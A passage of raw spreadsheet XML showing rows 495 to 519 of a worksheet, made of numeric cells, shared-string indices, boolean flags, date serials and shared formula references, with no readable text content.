      <c r="M495" s="1">
        <v>4.0</v>
      </c>
      <c r="N495" s="1" t="s">
        <v>2362</v>
      </c>
      <c r="O495" s="1" t="s">
        <v>1602</v>
      </c>
      <c r="P495" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q495" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R495" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S495" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="1">
        <v>7117.0</v>
      </c>
      <c r="B496" s="2" t="s">
        <v>2363</v>
      </c>
      <c r="C496" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D496" s="2" t="s">
        <v>2364</v>
      </c>
      <c r="E496" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F496" s="1" t="s">
        <v>2365</v>
      </c>
      <c r="G496" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H496" s="4">
        <v>44836.10902777778</v>
      </c>
      <c r="I496" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J496" s="1" t="s">
        <v>2366</v>
      </c>
      <c r="K496" s="2" t="s">
        <v>2367</v>
      </c>
      <c r="L496" s="1">
        <v>3.0</v>
      </c>
      <c r="M496" s="1">
        <v>4.0</v>
      </c>
      <c r="N496" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O496" s="1" t="s">
        <v>2368</v>
      </c>
      <c r="P496" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q496" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R496" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S496" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="1">
        <v>7118.0</v>
      </c>
      <c r="B497" s="2" t="s">
        <v>2369</v>
      </c>
      <c r="C497" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D497" s="2" t="s">
        <v>2364</v>
      </c>
      <c r="E497" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F497" s="1" t="s">
        <v>2370</v>
      </c>
      <c r="G497" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H497" s="4">
        <v>44836.12986111111</v>
      </c>
      <c r="I497" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J497" s="1" t="s">
        <v>2366</v>
      </c>
      <c r="K497" s="2" t="s">
        <v>2367</v>
      </c>
      <c r="L497" s="1">
        <v>3.0</v>
      </c>
      <c r="M497" s="1">
        <v>4.0</v>
      </c>
      <c r="N497" s="1" t="s">
        <v>2371</v>
      </c>
      <c r="O497" s="1" t="s">
        <v>2368</v>
      </c>
      <c r="P497" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q497" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R497" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S497" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="1">
        <v>7119.0</v>
      </c>
      <c r="B498" s="2" t="s">
        <v>2372</v>
      </c>
      <c r="C498" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D498" s="2" t="s">
        <v>2364</v>
      </c>
      <c r="E498" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F498" s="1" t="s">
        <v>2365</v>
      </c>
      <c r="G498" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H498" s="4">
        <v>44836.15555555555</v>
      </c>
      <c r="I498" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J498" s="1" t="s">
        <v>2366</v>
      </c>
      <c r="K498" s="2" t="s">
        <v>2367</v>
      </c>
      <c r="L498" s="1">
        <v>3.0</v>
      </c>
      <c r="M498" s="1">
        <v>4.0</v>
      </c>
      <c r="N498" s="1" t="s">
        <v>738</v>
      </c>
      <c r="O498" s="1" t="s">
        <v>2368</v>
      </c>
      <c r="P498" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q498" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R498" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S498" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="1">
        <v>7152.0</v>
      </c>
      <c r="B499" s="2" t="s">
        <v>2373</v>
      </c>
      <c r="C499" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D499" s="2" t="s">
        <v>2374</v>
      </c>
      <c r="E499" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F499" s="1" t="s">
        <v>2375</v>
      </c>
      <c r="G499" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H499" s="1" t="s">
        <v>2376</v>
      </c>
      <c r="I499" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J499" s="1" t="s">
        <v>2377</v>
      </c>
      <c r="K499" s="2" t="s">
        <v>2378</v>
      </c>
      <c r="L499" s="1">
        <v>6.0</v>
      </c>
      <c r="M499" s="1">
        <v>9.0</v>
      </c>
      <c r="N499" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O499" s="1" t="s">
        <v>2379</v>
      </c>
      <c r="P499" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q499" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R499" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S499" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="1">
        <v>7153.0</v>
      </c>
      <c r="B500" s="2" t="s">
        <v>2380</v>
      </c>
      <c r="C500" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D500" s="2" t="s">
        <v>2374</v>
      </c>
      <c r="E500" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F500" s="1" t="s">
        <v>1402</v>
      </c>
      <c r="G500" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H500" s="1" t="s">
        <v>2381</v>
      </c>
      <c r="I500" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J500" s="1" t="s">
        <v>2377</v>
      </c>
      <c r="K500" s="2" t="s">
        <v>2378</v>
      </c>
      <c r="L500" s="1">
        <v>6.0</v>
      </c>
      <c r="M500" s="1">
        <v>9.0</v>
      </c>
      <c r="N500" s="1" t="s">
        <v>2382</v>
      </c>
      <c r="O500" s="1" t="s">
        <v>2379</v>
      </c>
      <c r="P500" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q500" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R500" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S500" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="1">
        <v>7154.0</v>
      </c>
      <c r="B501" s="2" t="s">
        <v>2383</v>
      </c>
      <c r="C501" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D501" s="2" t="s">
        <v>2374</v>
      </c>
      <c r="E501" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F501" s="1" t="s">
        <v>2384</v>
      </c>
      <c r="G501" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H501" s="1" t="s">
        <v>2381</v>
      </c>
      <c r="I501" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J501" s="1" t="s">
        <v>2377</v>
      </c>
      <c r="K501" s="2" t="s">
        <v>2378</v>
      </c>
      <c r="L501" s="1">
        <v>6.0</v>
      </c>
      <c r="M501" s="1">
        <v>9.0</v>
      </c>
      <c r="N501" s="1" t="s">
        <v>132</v>
      </c>
      <c r="O501" s="1" t="s">
        <v>2379</v>
      </c>
      <c r="P501" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q501" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R501" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S501" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="1">
        <v>7155.0</v>
      </c>
      <c r="B502" s="2" t="s">
        <v>2385</v>
      </c>
      <c r="C502" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D502" s="2" t="s">
        <v>2374</v>
      </c>
      <c r="E502" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F502" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G502" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H502" s="1" t="s">
        <v>2386</v>
      </c>
      <c r="I502" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J502" s="1" t="s">
        <v>2377</v>
      </c>
      <c r="K502" s="2" t="s">
        <v>2378</v>
      </c>
      <c r="L502" s="1">
        <v>6.0</v>
      </c>
      <c r="M502" s="1">
        <v>9.0</v>
      </c>
      <c r="N502" s="1" t="s">
        <v>2387</v>
      </c>
      <c r="O502" s="1" t="s">
        <v>2379</v>
      </c>
      <c r="P502" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q502" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R502" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S502" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="1">
        <v>7156.0</v>
      </c>
      <c r="B503" s="2" t="s">
        <v>2388</v>
      </c>
      <c r="C503" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D503" s="2" t="s">
        <v>2374</v>
      </c>
      <c r="E503" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F503" s="1" t="s">
        <v>1177</v>
      </c>
      <c r="G503" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H503" s="1" t="s">
        <v>2389</v>
      </c>
      <c r="I503" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J503" s="1" t="s">
        <v>2377</v>
      </c>
      <c r="K503" s="2" t="s">
        <v>2378</v>
      </c>
      <c r="L503" s="1">
        <v>6.0</v>
      </c>
      <c r="M503" s="1">
        <v>9.0</v>
      </c>
      <c r="N503" s="1" t="s">
        <v>2390</v>
      </c>
      <c r="O503" s="1" t="s">
        <v>2379</v>
      </c>
      <c r="P503" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q503" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R503" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S503" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="1">
        <v>7157.0</v>
      </c>
      <c r="B504" s="2" t="s">
        <v>2391</v>
      </c>
      <c r="C504" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D504" s="2" t="s">
        <v>2374</v>
      </c>
      <c r="E504" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F504" s="1" t="s">
        <v>2392</v>
      </c>
      <c r="G504" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H504" s="5">
        <v>44512.01388888889</v>
      </c>
      <c r="I504" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J504" s="1" t="s">
        <v>2377</v>
      </c>
      <c r="K504" s="2" t="s">
        <v>2378</v>
      </c>
      <c r="L504" s="1">
        <v>6.0</v>
      </c>
      <c r="M504" s="1">
        <v>9.0</v>
      </c>
      <c r="N504" s="1" t="s">
        <v>2393</v>
      </c>
      <c r="O504" s="1" t="s">
        <v>2379</v>
      </c>
      <c r="P504" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q504" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R504" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S504" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="1">
        <v>7158.0</v>
      </c>
      <c r="B505" s="2" t="s">
        <v>2394</v>
      </c>
      <c r="C505" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D505" s="2" t="s">
        <v>2374</v>
      </c>
      <c r="E505" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F505" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G505" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H505" s="5">
        <v>44512.17222222222</v>
      </c>
      <c r="I505" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J505" s="1" t="s">
        <v>2377</v>
      </c>
      <c r="K505" s="2" t="s">
        <v>2378</v>
      </c>
      <c r="L505" s="1">
        <v>6.0</v>
      </c>
      <c r="M505" s="1">
        <v>9.0</v>
      </c>
      <c r="N505" s="1" t="s">
        <v>2395</v>
      </c>
      <c r="O505" s="1" t="s">
        <v>2379</v>
      </c>
      <c r="P505" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q505" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R505" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S505" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="1">
        <v>7159.0</v>
      </c>
      <c r="B506" s="2" t="s">
        <v>2396</v>
      </c>
      <c r="C506" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D506" s="2" t="s">
        <v>2374</v>
      </c>
      <c r="E506" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F506" s="1" t="s">
        <v>2392</v>
      </c>
      <c r="G506" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H506" s="5">
        <v>44512.94930555556</v>
      </c>
      <c r="I506" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J506" s="1" t="s">
        <v>2377</v>
      </c>
      <c r="K506" s="2" t="s">
        <v>2378</v>
      </c>
      <c r="L506" s="1">
        <v>6.0</v>
      </c>
      <c r="M506" s="1">
        <v>9.0</v>
      </c>
      <c r="N506" s="1" t="s">
        <v>2397</v>
      </c>
      <c r="O506" s="1" t="s">
        <v>2379</v>
      </c>
      <c r="P506" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q506" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R506" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S506" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="1">
        <v>7160.0</v>
      </c>
      <c r="B507" s="2" t="s">
        <v>2398</v>
      </c>
      <c r="C507" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D507" s="2" t="s">
        <v>2374</v>
      </c>
      <c r="E507" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F507" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G507" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H507" s="5">
        <v>44542.07777777778</v>
      </c>
      <c r="I507" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J507" s="1" t="s">
        <v>2377</v>
      </c>
      <c r="K507" s="2" t="s">
        <v>2378</v>
      </c>
      <c r="L507" s="1">
        <v>6.0</v>
      </c>
      <c r="M507" s="1">
        <v>9.0</v>
      </c>
      <c r="N507" s="1" t="s">
        <v>2399</v>
      </c>
      <c r="O507" s="1" t="s">
        <v>2379</v>
      </c>
      <c r="P507" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q507" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R507" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S507" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="1">
        <v>7321.0</v>
      </c>
      <c r="B508" s="2" t="s">
        <v>2400</v>
      </c>
      <c r="C508" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D508" s="2" t="s">
        <v>2401</v>
      </c>
      <c r="E508" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F508" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G508" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H508" s="4">
        <v>43993.770833333336</v>
      </c>
      <c r="I508" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J508" s="1" t="s">
        <v>2402</v>
      </c>
      <c r="K508" s="2" t="s">
        <v>2403</v>
      </c>
      <c r="L508" s="1">
        <v>1.0</v>
      </c>
      <c r="M508" s="1">
        <v>1.0</v>
      </c>
      <c r="N508" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O508" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P508" s="1" t="s">
        <v>573</v>
      </c>
      <c r="Q508" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R508" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="S508" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="1">
        <v>7322.0</v>
      </c>
      <c r="B509" s="2" t="s">
        <v>2404</v>
      </c>
      <c r="C509" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D509" s="2" t="s">
        <v>2405</v>
      </c>
      <c r="E509" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F509" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G509" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H509" s="4">
        <v>44536.777083333334</v>
      </c>
      <c r="I509" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J509" s="1" t="s">
        <v>2406</v>
      </c>
      <c r="K509" s="2" t="s">
        <v>2407</v>
      </c>
      <c r="L509" s="1">
        <v>1.0</v>
      </c>
      <c r="M509" s="1">
        <v>1.0</v>
      </c>
      <c r="N509" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O509" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P509" s="1" t="s">
        <v>2408</v>
      </c>
      <c r="Q509" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R509" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S509" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="1">
        <v>7327.0</v>
      </c>
      <c r="B510" s="2" t="s">
        <v>2409</v>
      </c>
      <c r="C510" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D510" s="2" t="s">
        <v>2410</v>
      </c>
      <c r="E510" s="2" t="s">
        <v>2411</v>
      </c>
      <c r="F510" s="1" t="s">
        <v>2412</v>
      </c>
      <c r="G510" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H510" s="1" t="s">
        <v>2413</v>
      </c>
      <c r="I510" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J510" s="1" t="s">
        <v>2414</v>
      </c>
      <c r="K510" s="2" t="s">
        <v>2415</v>
      </c>
      <c r="L510" s="1">
        <v>6.0</v>
      </c>
      <c r="M510" s="1">
        <v>9.0</v>
      </c>
      <c r="N510" s="1" t="s">
        <v>2416</v>
      </c>
      <c r="O510" s="1" t="s">
        <v>2417</v>
      </c>
      <c r="P510" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q510" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R510" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S510" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="1">
        <v>7348.0</v>
      </c>
      <c r="B511" s="2" t="s">
        <v>2418</v>
      </c>
      <c r="C511" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D511" s="2" t="s">
        <v>2419</v>
      </c>
      <c r="E511" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F511" s="1" t="s">
        <v>703</v>
      </c>
      <c r="G511" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H511" s="1" t="s">
        <v>2420</v>
      </c>
      <c r="I511" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J511" s="1" t="s">
        <v>2421</v>
      </c>
      <c r="K511" s="2" t="s">
        <v>2422</v>
      </c>
      <c r="L511" s="1">
        <v>14.0</v>
      </c>
      <c r="M511" s="1">
        <v>19.0</v>
      </c>
      <c r="N511" s="1" t="s">
        <v>2423</v>
      </c>
      <c r="O511" s="1" t="s">
        <v>2424</v>
      </c>
      <c r="P511" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q511" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R511" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S511" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="1">
        <v>7349.0</v>
      </c>
      <c r="B512" s="2" t="s">
        <v>2425</v>
      </c>
      <c r="C512" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D512" s="2" t="s">
        <v>2419</v>
      </c>
      <c r="E512" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F512" s="1" t="s">
        <v>1442</v>
      </c>
      <c r="G512" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H512" s="1" t="s">
        <v>2426</v>
      </c>
      <c r="I512" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J512" s="1" t="s">
        <v>2421</v>
      </c>
      <c r="K512" s="2" t="s">
        <v>2422</v>
      </c>
      <c r="L512" s="1">
        <v>14.0</v>
      </c>
      <c r="M512" s="1">
        <v>19.0</v>
      </c>
      <c r="N512" s="1" t="s">
        <v>2427</v>
      </c>
      <c r="O512" s="1" t="s">
        <v>2424</v>
      </c>
      <c r="P512" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q512" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R512" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S512" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="1">
        <v>7374.0</v>
      </c>
      <c r="B513" s="2" t="s">
        <v>2428</v>
      </c>
      <c r="C513" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D513" s="2" t="s">
        <v>2429</v>
      </c>
      <c r="E513" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F513" s="1" t="s">
        <v>685</v>
      </c>
      <c r="G513" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H513" s="4">
        <v>44384.05486111111</v>
      </c>
      <c r="I513" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J513" s="1" t="s">
        <v>2430</v>
      </c>
      <c r="K513" s="2" t="s">
        <v>2431</v>
      </c>
      <c r="L513" s="1">
        <v>3.0</v>
      </c>
      <c r="M513" s="1">
        <v>3.0</v>
      </c>
      <c r="N513" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O513" s="1" t="s">
        <v>2432</v>
      </c>
      <c r="P513" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q513" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R513" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S513" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="1">
        <v>7375.0</v>
      </c>
      <c r="B514" s="2" t="s">
        <v>2433</v>
      </c>
      <c r="C514" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D514" s="2" t="s">
        <v>2429</v>
      </c>
      <c r="E514" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F514" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G514" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H514" s="4">
        <v>44384.10277777778</v>
      </c>
      <c r="I514" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J514" s="1" t="s">
        <v>2430</v>
      </c>
      <c r="K514" s="2" t="s">
        <v>2431</v>
      </c>
      <c r="L514" s="1">
        <v>3.0</v>
      </c>
      <c r="M514" s="1">
        <v>3.0</v>
      </c>
      <c r="N514" s="1" t="s">
        <v>2434</v>
      </c>
      <c r="O514" s="1" t="s">
        <v>2432</v>
      </c>
      <c r="P514" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q514" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R514" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S514" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="1">
        <v>7377.0</v>
      </c>
      <c r="B515" s="2" t="s">
        <v>2435</v>
      </c>
      <c r="C515" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D515" s="2" t="s">
        <v>2436</v>
      </c>
      <c r="E515" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F515" s="1" t="s">
        <v>1922</v>
      </c>
      <c r="G515" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H515" s="1" t="s">
        <v>2437</v>
      </c>
      <c r="I515" s="1" t="s">
        <v>1292</v>
      </c>
      <c r="J515" s="1" t="s">
        <v>2438</v>
      </c>
      <c r="K515" s="2" t="s">
        <v>2439</v>
      </c>
      <c r="L515" s="1">
        <v>1.0</v>
      </c>
      <c r="M515" s="1">
        <v>1.0</v>
      </c>
      <c r="N515" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O515" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P515" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q515" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R515" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S515" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="1">
        <v>7572.0</v>
      </c>
      <c r="B516" s="2" t="s">
        <v>2440</v>
      </c>
      <c r="C516" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D516" s="2" t="s">
        <v>2441</v>
      </c>
      <c r="E516" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F516" s="1" t="s">
        <v>2442</v>
      </c>
      <c r="G516" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H516" s="1" t="s">
        <v>2443</v>
      </c>
      <c r="I516" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J516" s="1" t="s">
        <v>2444</v>
      </c>
      <c r="K516" s="2" t="s">
        <v>2445</v>
      </c>
      <c r="L516" s="1">
        <v>6.0</v>
      </c>
      <c r="M516" s="1">
        <v>6.0</v>
      </c>
      <c r="N516" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O516" s="1" t="s">
        <v>2446</v>
      </c>
      <c r="P516" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q516" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R516" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S516" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="1">
        <v>7578.0</v>
      </c>
      <c r="B517" s="2" t="s">
        <v>2447</v>
      </c>
      <c r="C517" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D517" s="2" t="s">
        <v>2448</v>
      </c>
      <c r="E517" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F517" s="1" t="s">
        <v>2449</v>
      </c>
      <c r="G517" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H517" s="4">
        <v>44661.42638888889</v>
      </c>
      <c r="I517" s="1" t="s">
        <v>1599</v>
      </c>
      <c r="J517" s="1" t="s">
        <v>2450</v>
      </c>
      <c r="K517" s="2" t="s">
        <v>2451</v>
      </c>
      <c r="L517" s="1">
        <v>1.0</v>
      </c>
      <c r="M517" s="1">
        <v>1.0</v>
      </c>
      <c r="N517" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O517" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P517" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q517" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R517" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S517" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="1">
        <v>7579.0</v>
      </c>
      <c r="B518" s="2" t="s">
        <v>2452</v>
      </c>
      <c r="C518" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D518" s="2" t="s">
        <v>2453</v>
      </c>
      <c r="E518" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F518" s="1" t="s">
        <v>652</v>
      </c>
      <c r="G518" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H518" s="1" t="s">
        <v>2454</v>
      </c>
      <c r="I518" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J518" s="1" t="s">
        <v>2455</v>
      </c>
      <c r="K518" s="2" t="s">
        <v>2456</v>
      </c>
      <c r="L518" s="1">
        <v>3.0</v>
      </c>
      <c r="M518" s="1">
        <v>5.0</v>
      </c>
      <c r="N518" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O518" s="1" t="s">
        <v>2457</v>
      </c>
      <c r="P518" s="1" t="s">
        <v>2216</v>
      </c>
      <c r="Q518" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R518" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S518" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="1">
        <v>7580.0</v>
      </c>
